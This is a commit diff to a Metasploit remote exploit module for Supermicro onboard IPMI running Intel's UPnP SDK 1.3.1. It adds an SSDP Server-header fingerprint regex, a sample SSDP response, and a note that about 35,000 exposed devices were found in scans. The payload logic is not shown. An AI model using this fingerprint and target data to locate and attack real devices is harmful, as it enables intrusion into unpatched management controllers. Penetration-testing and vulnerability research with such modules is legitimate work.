Add a fingerprint string and more comments
parent
1f227243b8
commit
9e491f0b1c
|
@ -68,12 +68,23 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
#
|
||||
# ROP targets are difficult to represent in the hash, use callbacks instead
|
||||
#
|
||||
[ "Supermicro Onboard IPMI (X7SPA-HF, X9SCL, X9SCM) Intel SDK 1.3.1", {
|
||||
:callback => :target_supermicro_ipmi_131
|
||||
[ "Supermicro Onboard IPMI (X9SCL/X9SCM) Intel SDK 1.3.1", {
|
||||
|
||||
# The callback handles all target-specific settings
|
||||
:callback => :target_supermicro_ipmi_131,
|
||||
|
||||
# This matches the Server header of a SSDP reply
|
||||
:fingerprint_server =>
|
||||
/Linux\/2\.6\.17\.WB_WPCM450\.1\.3 UPnP\/1\.0, Intel SDK for UPnP devices\/1\.3\.1/
|
||||
|
||||
#
|
||||
# SSDP response:
|
||||
# UPnP/1.0, Intel SDK for UPnP devices/1.3.1
|
||||
# http://192.168.x.x:49160/IPMIdevicedesc.xml
|
||||
# uuid:Upnp-IPMI-1_0-1234567890001::upnp:rootdevice
|
||||
# Linux/2.6.17.WB_WPCM450.1.3 UPnP/1.0, Intel SDK for UPnP devices/1.3.1
|
||||
# http://192.168.xx.xx:49152/IPMIdevicedesc.xml
|
||||
# uuid:Upnp-IPMI-1_0-1234567890001::upnp:rootdevice
|
||||
|
||||
# Approximately 35,000 of these found in the wild via critical.io scans (2013-02-03)
|
||||
|
||||
} ]
|
||||
],
|
||||
'DisclosureDate' => 'Feb 03 2013'))
|
||||
|
|
Loading…
Reference in New Issue